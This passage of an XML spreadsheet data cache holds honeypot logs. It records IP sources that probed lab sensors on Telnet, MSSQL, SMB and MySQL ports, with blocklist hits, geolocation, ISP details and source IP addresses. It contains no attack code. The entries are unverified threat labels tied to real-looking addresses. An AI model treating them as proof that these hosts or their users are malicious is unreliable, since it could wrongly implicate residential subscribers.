    <m/>
    <m/>
  </r>
  <r>
    <x v="2089"/>
    <x v="2089"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T18:11:35"/>
    <d v="2023-12-17T08:43:33"/>
    <d v="2025-04-12T18:11:35"/>
    <n v="16"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;8810&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Korea Telecom"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b17:155e"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2090"/>
    <x v="2090"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T18:09:03"/>
    <d v="2024-04-14T10:55:24"/>
    <d v="2025-04-12T18:09:03"/>
    <n v="39"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="20115&amp;&amp;1433&amp;&amp;445&amp;&amp;51753&amp;&amp;51624"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="24309"/>
    <s v="Atria Convergence Technologies Pvt. Ltd.,"/>
    <s v="ACT Fibernet"/>
    <s v="residential"/>
    <s v="Atria Convergence Technologies Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="None&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (49.205.218.245,51587)}&amp;&amp;{Data_SMB:Incoming connection (49.205.218.245,54224)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (49.205.218.245,57212)}&amp;&amp;{Data_SMB:Incoming connection (49.205.218.245,62090)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;NA&amp;&amp;{Data_SMB:Incoming connection (49.205.218.245,53273)}&amp;&amp;{Data_SMB:Incoming connection (49.205.218.245,53857)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (49.205.218.245,59190)}&amp;&amp;{Data_SMB:Incoming connection (49.205.218.245,59813)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:31cd:daf5"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2091"/>
    <x v="2091"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T17:57:00"/>
    <d v="2024-11-25T13:14:21"/>
    <d v="2025-04-12T17:57:00"/>
    <n v="52"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="54"/>
    <s v="Bắc Giang Province"/>
    <s v="Huyện Lạng Giang"/>
    <s v="Kép"/>
    <s v="1579752"/>
    <s v="NA"/>
    <s v="21.4"/>
    <s v="106.267"/>
    <s v="18403"/>
    <s v="FPT Telecom Company"/>
    <s v="FPT Telecom Company"/>
    <s v="business"/>
    <s v="Vietnam Internet Network Information Center"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7646:508b"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2092"/>
    <x v="2092"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T17:30:17"/>
    <d v="2023-11-26T13:23:59"/>
    <d v="2025-04-12T17:30:17"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="58914&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="CL"/>
    <s v="Chile"/>
    <s v="RM"/>
    <s v="Santiago Metropolitan"/>
    <s v="Provincia de Santiago"/>
    <s v="Las Condes"/>
    <s v="3884447"/>
    <s v="7550000"/>
    <s v="-33.4155"/>
    <s v="-70.6056"/>
    <s v="27651"/>
    <s v="ENTEL CHILE S.A."/>
    <s v="Entel Chile S.A."/>
    <s v="business"/>
    <s v="Entel Chile S.A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a44d:93ba"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2093"/>
    <x v="2093"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T17:08:52"/>
    <d v="2025-04-12T12:21:58"/>
    <d v="2025-04-12T17:08:52"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c2:11b4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2094"/>
    <x v="2094"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T17:03:47"/>
    <d v="2025-04-12T17:03:47"/>
    <d v="2025-04-12T17:03:47"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="12"/>
    <s v="Nonthaburi"/>
    <s v="Bang Kruai"/>
    <s v="Bang Kruai"/>
    <s v="1619434"/>
    <s v="NA"/>
    <s v="13.805"/>
    <s v="100.473"/>
    <s v="23969"/>
    <s v="TOT-NET"/>
    <s v="TOT Public Company Limited"/>
    <s v="corporate"/>
    <s v="TOT Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7d19:64b5"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2095"/>
    <x v="2095"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T16:53:08"/>
    <d v="2025-04-03T16:38:58"/>
    <d v="2025-04-12T16:53:08"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Surat"/>
    <s v="Surat (Vesu)"/>
    <s v="1255364"/>
    <s v="395007"/>
    <s v="21.1494"/>
    <s v="72.7728"/>
    <s v="45117"/>
    <s v="Ishan's Network"/>
    <s v="Bharatbhai Dinubhai Amin"/>
    <s v="business"/>
    <s v="City Broadband"/>
    <s v="2018-06-05"/>
    <s v="INPL-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.116.178.122,58234)}&amp;&amp;{Data_SMB:Incoming connection (103.116.178.122,58606)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6774:b27a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2096"/>
    <x v="2096"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T16:50:21"/>
    <d v="2024-09-01T21:14:00"/>
    <d v="2025-04-12T16:50:21"/>
    <n v="64"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_ORACLE_H30&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="1433&amp;&amp;389&amp;&amp;62904&amp;&amp;1521&amp;&amp;24338&amp;&amp;445&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UP"/>
    <s v="Uttar Pradesh"/>
    <s v="Gautam Buddha Nagar"/>
    <s v="Noida (Bishanpura)"/>
    <s v="7279746"/>
    <s v="201307"/>
    <s v="28.6099"/>
    <s v="77.3543"/>
    <s v="45528"/>
    <s v="Tikona Infinet Ltd."/>
    <s v="Tikona Infinet Ltd."/>
    <s v="business"/>
    <s v="Tikona Digital Networks Pvt.Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (113.193.208.186,58999)}&amp;&amp;{Data_SMB:Incoming connection (113.193.208.186,59913)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (113.193.208.186,63264)}&amp;&amp;{Data_SMB:Incoming connection (113.193.208.186,63846)}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:71c1:d0ba"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2097"/>
    <x v="2097"/>
    <s v="81-231-227-195-no2101.tbcn.telia.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-12T16:25:36"/>
    <d v="2025-04-10T12:25:39"/>
    <d v="2025-04-12T16:25:36"/>
    <n v="29"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="SE"/>
    <s v="Sweden"/>
    <s v="AB"/>
    <s v="Stockholm"/>
    <s v="Stockholm Municipality"/>
    <s v="Stockholm"/>
    <s v="2673730"/>
    <s v="100 04"/>
    <s v="59.3293"/>
    <s v="18.0686"/>
    <s v="3301"/>
    <s v="Telia Company AB"/>
    <s v="Telia Company AB"/>
    <s v="business"/>
    <s v="Telia Network Services"/>
    <s v="2002-10-04"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:51e7:e3c3"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2098"/>
    <x v="2098"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T16:07:43"/>
    <d v="2024-12-03T11:52:21"/>
    <d v="2025-04-12T16:07:43"/>
    <n v="27"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H8"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TS"/>
    <s v="Telangana"/>
    <s v="Hyderabad"/>
    <s v="Hyderabad (Matha Nagar)"/>
    <s v="1269843"/>
    <s v="500001"/>
    <s v="17.4243"/>
    <s v="78.4552"/>
    <s v="150008"/>
    <s v="Pioneer Elabs Ltd."/>
    <s v="Viswaroopa Info Services India Private ltd"/>
    <s v="business"/>
    <s v="Viswaroopa Info Services India Private Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.248.210.213,53526)}&amp;&amp;{Data_SMB:Incoming connection (103.248.210.213,54336)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.248.210.213,59001)}&amp;&amp;{Data_SMB:Incoming connection (103.248.210.213,59500)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.248.210.213,58891)}&amp;&amp;{Data_SMB:Incoming connection (103.248.210.213,59293)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67f8:d2d5"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2099"/>
    <x v="2099"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T15:41:39"/>
    <d v="2025-03-31T00:17:25"/>
    <d v="2025-04-12T15:41:39"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="05"/>
    <s v="Vinnytsia"/>
    <s v="Vinnytsya Raion"/>
    <s v="Vinnytsia"/>
    <s v="689558"/>
    <s v="NA"/>
    <s v="49.2267"/>
    <s v="28.4406"/>
    <s v="49223"/>
    <s v="EVEREST TV AND RADIO COMPANY LLC"/>
    <s v="OOlshtynISP primary"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2019-02-15"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d43:14d5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2100"/>
    <x v="2100"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T15:09:38"/>
    <d v="2024-04-14T11:44:26"/>
    <d v="2025-04-12T15:09:38"/>
    <n v="18"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;2154&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="VE"/>
    <s v="Venezuela"/>
    <s v="V"/>
    <s v="Zulia"/>
    <s v="Colón Municipality"/>
    <s v="San Carlos del Zulia"/>
    <s v="3628489"/>
    <s v="NA"/>
    <s v="9.00189"/>
    <s v="-71.9105"/>
    <s v="8048"/>
    <s v="CANTV Servicios, Venezuela"/>
    <s v="CANTV Servicios, Venezuela"/>
    <s v="business"/>
    <s v="CANTV Servicios, Venezuela"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:beca:4ee"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2101"/>
    <x v="2101"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T14:51:16"/>
    <d v="2025-04-12T14:50:18"/>
    <d v="2025-04-12T14:51:16"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UP"/>
    <s v="Uttar Pradesh"/>
    <s v="Aligarh"/>
    <s v="Jalālī"/>
    <s v="1269441"/>
    <s v="NA"/>
    <s v="27.8668"/>
    <s v="78.2527"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="RELIANCEJIO"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:983b:5fc9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2102"/>
    <x v="2102"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T14:28:58"/>
    <d v="2025-04-12T14:28:58"/>
    <d v="2025-04-12T14:28:58"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783c:7353"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2103"/>
    <x v="2103"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T14:27:37"/>
    <d v="2025-04-12T14:27:37"/>
    <d v="2025-04-12T14:27:37"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru (RajajiNagar)"/>
    <s v="1277333"/>
    <s v="560010"/>
    <s v="13.0123"/>
    <s v="77.5558"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Quadgen WiFi Project C/O Addl GM P3 Bangalore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
